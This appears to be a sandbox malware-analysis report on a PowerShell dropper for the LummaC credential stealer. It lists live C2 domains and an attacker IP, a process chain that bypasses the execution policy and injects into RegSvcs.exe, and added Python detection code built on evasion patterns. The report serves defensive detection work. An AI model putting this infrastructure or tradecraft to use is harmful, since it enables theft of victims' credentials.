Analysis Report (Windows): 176.113.115.225.ps1
Overview
Detection
Score | Range | Whitelisted | Confidence |
---|---|---|---|
100 | 0 - 100 | false | 100% |
Process tree
- System is w10x64
- powershell.exe (PID 7816, MD5 04029E121A0CFA5991749937DD22A1D9), cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.225.ps1"
- conhost.exe (PID 7824, MD5 0D698AF330FD17BEE3BF90011D49251D), cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- RegSvcs.exe (PID 8024, MD5 9D352BC46709F0CB5EC974633A0C3C94), cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
- wermgr.exe (PID 8040, MD5 74A0194782E039ACE1F7349544DC1CF4), cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "7816" "2580" "2544" "1988" "0" "0" "2592" "0" "0" "0" "0" "0"
- cleanup
Malware Configuration
{
"C2 url": [
"pleasedcfrown.biz",
"affordtempyo.biz",
"mixedrecipew.biz",
"hoursuhouy.biz",
"suggestyuoz.biz",
"lightdeerysua.biz",
"toppyneedus.biz",
"impolitewearr.biz",
"grapeprivatter.cyou"
]
}
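The process chain in the tree above is the part of this report a detection engineer would turn into a rule: powershell.exe started with -ExecutionPolicy unrestricted -file, followed by RegSvcs.exe from the .NET Framework directory with an empty command line, and wermgr.exe whose "-outproc 0 7816" arguments name the PowerShell PID (Windows Error Reporting invoked for that process). The Python below is an added example, not code from Joe Sandbox or from the sample: it encodes that chain as a check over Sysmon-style process-creation events. The events are constructed to mirror the tree (PIDs and command lines as shown); the parent/child links, the field names, and the list of .NET host binaries that are commonly launched argument-less to host injected code are assumptions of this example, not findings of the report.

```python
"""Added example (not from the report or the sample): detect the chain
powershell.exe -ExecutionPolicy unrestricted -file <script> -> RegSvcs.exe
over Sysmon-style process-creation events. Field names, parent links and
the host-binary list are assumptions of this example."""
import re
import shlex
from dataclasses import dataclass
from typing import Optional

# .NET Framework utilities commonly launched with an empty command line to
# host injected code (assumption about tradecraft, not a report finding).
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe",
                "msbuild.exe", "applaunch.exe"}

PS_POLICY = re.compile(r"-e(?:xecutionpolicy|p)?\s+(?:unrestricted|bypass)", re.I)
PS_FILE = re.compile(r"-f(?:ile)?\s+", re.I)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: Optional[int]
    image: str
    cmdline: str

    @property
    def name(self) -> str:
        return self.image.rsplit("\\", 1)[-1].lower()

    def args(self) -> list:
        # Windows-style split: keep quoted tokens intact, drop the image itself.
        return shlex.split(self.cmdline, posix=False)[1:]


def find_powershell_to_dotnet_host(events) -> list:
    """One finding per argument-less .NET host binary whose parent is
    powershell.exe; each finding lists the reasons it was flagged."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for child in events:
        if child.name not in DOTNET_HOSTS or child.args():
            continue  # only argument-less launches of a known host binary
        parent = by_pid.get(child.ppid)
        if parent is None or parent.name != "powershell.exe":
            continue
        reasons = [f"argument-less {child.name} spawned by powershell.exe"]
        if PS_POLICY.search(parent.cmdline):
            reasons.append("execution policy override")
        m = PS_FILE.search(parent.cmdline)
        if m:
            script = shlex.split(parent.cmdline[m.end():], posix=False)[0].strip('"')
            reasons.append(f"script file {script}")
        findings.append({"parent_pid": parent.pid, "child_pid": child.pid,
                         "reasons": reasons})
    return findings


# Constructed to mirror the process tree in this report (PIDs and command
# lines as shown there; the ppid links are assumed).
REPORT_EVENTS = [
    ProcEvent(7816, None, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo '
              r'-ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.225.ps1"'),
    ProcEvent(7824, 7816, r"C:\Windows\system32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(8024, 7816, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"'),
    ProcEvent(8040, 7816, r"C:\Windows\system32\wermgr.exe",
              r'"C:\Windows\system32\wermgr.exe" "-outproc" "0" "7816" "2580" "2544" '
              r'"1988" "0" "0" "2592" "0" "0" "0" "0" "0"'),
]

# Constructed benign control: an installer registering an assembly passes an
# argument to RegSvcs.exe and is not started by PowerShell, so it is not flagged.
BENIGN_EVENTS = [
    ProcEvent(4000, None, r"C:\Windows\System32\msiexec.exe", r"msiexec.exe /i app.msi"),
    ProcEvent(4010, 4000, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" "C:\App\Svc.dll"'),
]

if __name__ == "__main__":
    for f in find_powershell_to_dotnet_host(REPORT_EVENTS):
        print(f["parent_pid"], "->", f["child_pid"], "; ".join(f["reasons"]))
```

The empty-argument test is what separates the hollowing pattern from legitimate use: RegSvcs.exe and its siblings always take an assembly path when used for their documented purpose, so an argument-less launch under a script interpreter is worth an alert on its own, and the execution-policy override and script path are added as context rather than as conditions.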
Yara matches
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | |
 | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security | |
Sigma rule matches
- Rule author: frack113
- Rule author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Suricata IDS alerts (all signatures, ordered by time)
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-27T15:58:20.506711+0100 | 2059421 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 61999 | 1.1.1.1 | 53 | UDP |
2025-01-27T15:58:20.519335+0100 | 2059423 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 61168 | 1.1.1.1 | 53 | UDP |
2025-01-27T15:58:21.067993+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49743 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:21.067993+0100 | 2059424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49743 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:21.593553+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49743 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:21.593553+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.7 | 49743 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:22.192148+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49751 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:22.192148+0100 | 2059424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49751 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:22.688671+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49751 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:22.688671+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.7 | 49751 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:23.347094+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49759 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:23.347094+0100 | 2059424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49759 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:24.082393+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49759 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:24.600432+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49771 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:24.600432+0100 | 2059424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49771 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:26.035507+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49782 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:26.035507+0100 | 2059424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49782 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:27.552936+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49791 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:27.552936+0100 | 2059424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49791 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:29.081608+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49802 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:29.081608+0100 | 2059424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49802 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:33.152602+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49826 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:33.152602+0100 | 2059424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49826 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:33.908893+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49826 | 104.21.29.142 | 443 | TCP |
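Read per flow rather than per signature, the alerts above tell a short story: two DNS lookups for C2 domains (SIDs 2059421 and 2059423 to 1.1.1.1:53), then eight TLS connections to 104.21.29.142:443 that each trigger the generic Unknown Traffic and domain-reputation rules, of which only four go on to trigger a payload-level signature. The Python below is an added example, not part of the Joe Sandbox report: it re-parses the rows of the table above, groups them by 5-tuple, lists the connections that escalated beyond the reputation match, and measures how far the DNS alerts preceded the first TLS flow. The rows are copied from this page; treating the Network Trojan and Malware Command and Control classtypes as payload-level confirmation is an assumption of the example.

```python
"""Added example (not part of the Joe Sandbox report): re-parse the Suricata
alert rows above and correlate them per flow."""
from dataclasses import dataclass, field
from datetime import datetime

# Rows copied from the alert table on this page (trailing pipe dropped).
ALERT_ROWS = """
2025-01-27T15:58:20.506711+0100 | 2059421 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 61999 | 1.1.1.1 | 53 | UDP
2025-01-27T15:58:20.519335+0100 | 2059423 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 61168 | 1.1.1.1 | 53 | UDP
2025-01-27T15:58:21.067993+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49743 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:21.067993+0100 | 2059424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49743 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:21.593553+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49743 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:21.593553+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.7 | 49743 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:22.192148+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49751 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:22.192148+0100 | 2059424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49751 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:22.688671+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49751 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:22.688671+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.7 | 49751 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:23.347094+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49759 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:23.347094+0100 | 2059424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49759 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:24.082393+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49759 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:24.600432+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49771 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:24.600432+0100 | 2059424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49771 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:26.035507+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49782 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:26.035507+0100 | 2059424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49782 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:27.552936+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49791 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:27.552936+0100 | 2059424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49791 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:29.081608+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49802 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:29.081608+0100 | 2059424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49802 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:33.152602+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49826 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:33.152602+0100 | 2059424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49826 | 104.21.29.142 | 443 | TCP
2025-01-27T15:58:33.908893+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49826 | 104.21.29.142 | 443 | TCP
"""

# Classtypes treated as payload-level confirmation rather than reputation
# matches (an assumption of this example).
PAYLOAD_CLASSTYPES = {"A Network Trojan was detected",
                      "Malware Command and Control Activity Detected"}


@dataclass
class Alert:
    ts: datetime
    sid: int
    severity: int
    classtype: str
    src: str
    sport: int
    dst: str
    dport: int
    proto: str

    @property
    def flow(self) -> tuple:
        return (self.proto, self.src, self.sport, self.dst, self.dport)


@dataclass
class FlowSummary:
    first_seen: datetime
    sids: set = field(default_factory=set)
    classtypes: set = field(default_factory=set)


def parse_alerts(text: str) -> list:
    alerts = []
    for line in text.strip().splitlines():
        ts, sid, sev, ctype, src, sport, dst, dport, proto = [c.strip() for c in line.split("|")]
        alerts.append(Alert(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"), int(sid), int(sev),
                            ctype, src, int(sport), dst, int(dport), proto))
    return alerts


def correlate(alerts) -> dict:
    """Group alerts by 5-tuple, keeping the earliest timestamp per flow."""
    flows = {}
    for a in sorted(alerts, key=lambda a: a.ts):
        s = flows.setdefault(a.flow, FlowSummary(first_seen=a.ts))
        s.sids.add(a.sid)
        s.classtypes.add(a.classtype)
    return flows


def escalated_flows(flows) -> list:
    """Flows on which a payload-level signature fired in addition to the
    Unknown Traffic / domain-reputation hits."""
    return sorted(k for k, s in flows.items() if s.classtypes & PAYLOAD_CLASSTYPES)


def dns_lead_seconds(flows) -> float:
    """How long the C2-domain DNS alerts preceded the first TLS flow alert."""
    dns = min(s.first_seen for k, s in flows.items() if k[0] == "UDP" and k[4] == 53)
    tcp = min(s.first_seen for k, s in flows.items() if k[0] == "TCP")
    return (tcp - dns).total_seconds()


FLOWS = correlate(parse_alerts(ALERT_ROWS))

if __name__ == "__main__":
    for key, s in sorted(FLOWS.items(), key=lambda kv: kv[1].first_seen):
        print(key, sorted(s.sids), "ESCALATED" if s.classtypes & PAYLOAD_CLASSTYPES else "")
    print("DNS lead time: %.3fs" % dns_lead_seconds(FLOWS))
```

Run against these rows, the DNS alerts precede the first TLS connection by about 0.56 seconds and the escalated connections are the ones on source ports 49743, 49751, 49759 and 49826; the other four TLS flows carry nothing beyond the reputation match, which is the usual picture for a stealer that retries its C2 list.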
Signature categories
- AV Detection
- Cryptography
- Compliance
- Software Vulnerabilities
- Networking
- Key, Mouse, Clipboard, Microphone and Screen Capturing
- System Summary
- Data Obfuscation
- Hooking and other Techniques for Hiding and Protection
- Malware Analysis System Evasion
- Anti Debugging
- HIPS / PFW / Operating System Protection Evasion
- Language, Device and Operating System Detection
- Lowering of HIPS / PFW / Operating System Security Settings
- Stealing of Sensitive Information
- Remote Access Functionality
AV Detection
- Avira URL Cloud: 13 entries
- Malware Configuration Extractor: 1 entry
- Virustotal: 1 entry (perma link)
- Integrated Neural Analysis Model: 1 entry
- String decryptor: 9 entries
- Code function: 3_2_0041E081
- HTTPS traffic detected: 8 entries
- Binary string: 1 entry
- Code function (process 3, 83 entries):
  3_2_004100EC, 3_2_0040CA90, 3_2_00445B30, 3_2_0042CBE0, 3_2_0043EC10, 3_2_0043EC10, 3_2_00429F42, 3_2_0040CF60,
  3_2_00412762, 3_2_00412762, 3_2_0040F717, 3_2_00443F26, 3_2_004467E0, 3_2_004467E0, 3_2_00419000, 3_2_00419000,
  3_2_00419000, 3_2_0042D020, 3_2_0042E03E, 3_2_004450C0, 3_2_004450D9, 3_2_004450DB, 3_2_0042D14A, 3_2_00427150,
  3_2_0041C955, 3_2_0041C955, 3_2_00430930, 3_2_0043F9C0, 3_2_0043F9C0, 3_2_0043F9C0, 3_2_004441FF, 3_2_0042FA03,
  3_2_00442200, 3_2_00444A31, 3_2_0040DAC0, 3_2_0042AAC2, 3_2_0043428A, 3_2_00420289, 3_2_0042AA89, 3_2_0040A360,
  3_2_0040A360, 3_2_0040E360, 3_2_00433B7D, 3_2_00445310, 3_2_004343D8, 3_2_00431BE0, 3_2_004343EF, 3_2_00434393,
  3_2_004433A1, 3_2_004433A1, 3_2_004433A1, 3_2_004453B0, 3_2_00411BBF, 3_2_00419C65, 3_2_00426C20, 3_2_0040DD4A,
  3_2_0040EDC8, 3_2_004105D0, 3_2_0042F59D, 3_2_0043BDB0, 3_2_00443634, 3_2_00443634, 3_2_00420EC3, 3_2_00420EC3,
  3_2_004206EB, 3_2_0042EE95, 3_2_00418F40, 3_2_00421748, 3_2_00421748, 3_2_0041BF76, 3_2_0041BF76, 3_2_0041BF76,
  3_2_0041BF76, 3_2_00442710, 3_2_00421735, 3_2_00421735, 3_2_00425FF3, 3_2_00444F80, 3_2_0040EF95, 3_2_0041D797,
  3_2_0041D797, 3_2_0041FFA1, 3_2_00444FB0
Networking
- Suricata IDS: 16 entries
- URLs: 9 entries
- IP Address: 1 entry
- JA3 fingerprint: 1 entry
- Suricata IDS: 8 entries
- HTTP traffic detected: 8 entries
- UDP traffic detected without corresponding DNS query: 4 entries
- DNS traffic detected: 4 entries
- HTTP traffic detected: 1 entry
- String found in binary or memory: 23 entries
- Network traffic detected: 16 entries
- HTTPS traffic detected: 8 entries
- Code function: 3_2_0043A020, 3_2_0043A020, 3_2_0043A1C0
- Window created: 1 entry
- Code function: 0_2_00007FFAAC48211D
- Code function (process 3, 108 entries):
  3_2_0043E8D0, 3_2_0043388C, 3_2_0040BA50, 3_2_0040CA90, 3_2_00445B30, 3_2_0042CBE0, 3_2_0043EC10, 3_2_00426420, 3_2_0041CEE6,
  3_2_00429F42, 3_2_00412762, 3_2_0040F717, 3_2_004467E0, 3_2_00401040, 3_2_00425850, 3_2_00409000, 3_2_00419000, 3_2_0043E000,
  3_2_00436010, 3_2_00446010, 3_2_0042D020, 3_2_004450C0, 3_2_004228D0, 3_2_004450D9, 3_2_004450DB, 3_2_004300E0, 3_2_0042A8F0,
  3_2_0041B0F4, 3_2_0040D0B0, 3_2_004048B2, 3_2_004380B0, 3_2_0042F0B5, 3_2_0042D14A, 3_2_00427150, 3_2_0041C955, 3_2_0043395B,
  3_2_00413100, 3_2_0041A120, 3_2_0043F9C0, 3_2_0042DA42, 3_2_0042E240, 3_2_0043DA4B, 3_2_0042C250, 3_2_0043E260, 3_2_00435A69,
  3_2_00416200, 3_2_00424230, 3_2_00444A31, 3_2_0042AAC2, 3_2_0042EAC0, 3_2_00422280, 3_2_0043428A, 3_2_00433AA0, 3_2_004402A0,
  3_2_00421B50, 3_2_0040A360, 3_2_0040E360, 3_2_0042E367, 3_2_00413309, 3_2_00445310, 3_2_00402B30, 3_2_00434BE0, 3_2_004343EF,
  3_2_004463F0, 3_2_00408B90, 3_2_00434393, 3_2_0041B3A0, 3_2_004433A1, 3_2_004363AF, 3_2_004453B0, 3_2_00411BBF, 3_2_0041FC4E,
  3_2_00426C20, 3_2_0042A4E0, 3_2_0042FE49, 3_2_00413CB0, 3_2_0043D560, 3_2_0042DD6D, 3_2_0041A51C, 3_2_004105D0, 3_2_00409580,
  3_2_00403590, 3_2_0040BDA0, 3_2_00439DA0, 3_2_0041E5B0, 3_2_0042FE49, 3_2_0040C660, 3_2_00407E60, 3_2_00421E70, 3_2_00443634,
  3_2_00420EC3, 3_2_0043F6C0, 3_2_004156CB, 3_2_004456E0, 3_2_00433698, 3_2_004226A0, 3_2_0042A750, 3_2_00402760, 3_2_00428764,
  3_2_0041BF76, 3_2_0043C778, 3_2_0042BF00, 3_2_0043FF00, 3_2_00442710, 3_2_00403FD0, 3_2_0040EF95, 3_2_0041D797, 3_2_00444FB0
Other signature evidence
- Classification label: 1 entry
- Code function: 3_2_0043EC10
- File created: 1 entry
- Mutant created: 3 entries
- File created: 1 entry
- File read: 1 entry
- Key opened: 1 entry
- Virustotal: 1 entry
- Process created: 6 entries
- Section loaded: 52 entries
- Window detected: 1 entry
- File opened: 1 entry
- Binary string: 1 entry
- Code function (process 3): 3_2_0043904F, 3_2_0044B0E1, 3_2_0044B0DD, 3_2_0044B0FD, 3_2_0044B145, 3_2_0044B545, 3_2_0044B541, 3_2_0044F6B3, 3_2_0041F781, 3_2_00444F81
- Process information set: 141 entries
Malware Analysis System Evasion |
---|
Source: | WMI Queries: |
Source: | System information queried: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | WMI Queries: |
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 3_2_00443AB0 |
Source: | Process token adjusted: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Memory written: | Jump to behavior |
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Binary or memory string: |
Source: | WMI Queries: |
Stealing of Sensitive Information |
---|
Source: | File source: |
Source: | String found in binary or memory: |
Source: | File opened: | Jump to behavior |
Source: | Directory queried: | Jump to behavior |
Remote Access Functionality |
---|
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Windows Management Instrumentation | 1 DLL Side-Loading | 211 Process Injection | 1 Masquerading | 2 OS Credential Dumping | 231 Security Software Discovery | Remote Services | 1 Screen Capture | 21 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 231 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 211 Process Injection | Security Account Manager | 231 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 41 Data from Local System | 113 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | 3 Clipboard Data | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 11 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 32 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| | 8% | ReversingLabs | Win32.Trojan.Generic | |
| | 11% | Virustotal | | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| | 100% | Avira URL Cloud | malware | |
| | 100% | Avira URL Cloud | malware | |
| | 100% | Avira URL Cloud | malware | |
| | 100% | Avira URL Cloud | malware | |
| | 100% | Avira URL Cloud | malware | |
| | 100% | Avira URL Cloud | malware | |
| | 100% | Avira URL Cloud | malware | |
| | 0% | Avira URL Cloud | safe | |
| | 100% | Avira URL Cloud | malware | |
| | 100% | Avira URL Cloud | malware | |
| | 100% | Avira URL Cloud | malware | |
| | 100% | Avira URL Cloud | malware | |
| | 100% | Avira URL Cloud | malware | |
| | 100% | Avira URL Cloud | malware | |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
twc.trafficmanager.net | 104.40.149.189 | true | false | high | |
toppyneedus.biz | 104.21.29.142 | true | false | high | |
s-part-0017.t-0009.fb-t-msedge.net | 13.107.253.45 | true | false | high | |
impolitewearr.biz | unknown | unknown | false | high | |
grapeprivatter.cyou | unknown | unknown | true | unknown | |
time.windows.com | unknown | unknown | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
| | true | | unknown |
| | true | | unknown |
| | true | | unknown |
| | false | | high |
| | true | | unknown |
| | true | | unknown |
| | true | | unknown |
| | true | | unknown |
| | true | | unknown |
| | true | | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
| | | false | | high |
| | | false | | high |
| | | false | | high |
| | | false | | high |
| | | false | | high |
| | | false | | high |
| | | false | | high |
| | | false | | high |
| | | false | | unknown |
| | | false | | unknown |
| | | false | | unknown |
| | | false | | high |
| | | false | | unknown |
| | | false | | high |
| | | false | | high |
| | | false | | high |
| | | false | | high |
| | | false | | high |
| | | false | | high |
| | | false | | unknown |
| | | false | | high |
| | | false | | high |
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
104.21.29.142 | toppyneedus.biz | United States | | 13335 | CLOUDFLARENETUS | false |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1600469 |
Start date and time: | 2025-01-27 15:57:09 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 45s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of new started processes analysed: | 11 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 176.113.115.225.ps1 |
Detection: | MAL |
Classification: | mal100.troj.spyw.evad.winPS1@6/10@4/1 |
EGA Information: | |
HCA Information: | |
Cookbook Comments: | |
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 20.42.73.29, 13.107.253.45, 40.126.31.67, 4.245.163.56
- Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target powershell.exe, PID 7816 because it is empty
- Not all processes were analyzed, report is missing behavior information
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description |
---|---|---|
09:58:18 | API Interceptor | |
09:58:19 | API Interceptor | |
09:59:09 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
104.21.29.142 | | Get hash | malicious | Amadey, AsyncRAT, KeyLogger, LummaC Stealer, PureLog Stealer, ReverseShell, Stealc | Browse | |
| | | Get hash | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, Socks5Systemz, Vidar | Browse | |
| | | Get hash | malicious | LummaC Stealer | Browse | |
| | | Get hash | malicious | LummaC Stealer | Browse | |
| | | Get hash | malicious | LummaC Stealer | Browse | |
| | | Get hash | malicious | LummaC Stealer, PureLog Stealer | Browse | |
| | | Get hash | malicious | LummaC Stealer | Browse | |
| | | Get hash | malicious | Amadey, LummaC Stealer, PureLog Stealer | Browse | |
| | | Get hash | malicious | LummaC Stealer, PureLog Stealer | Browse | |
| | | Get hash | malicious | LummaC Stealer, PureLog Stealer | Browse | |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
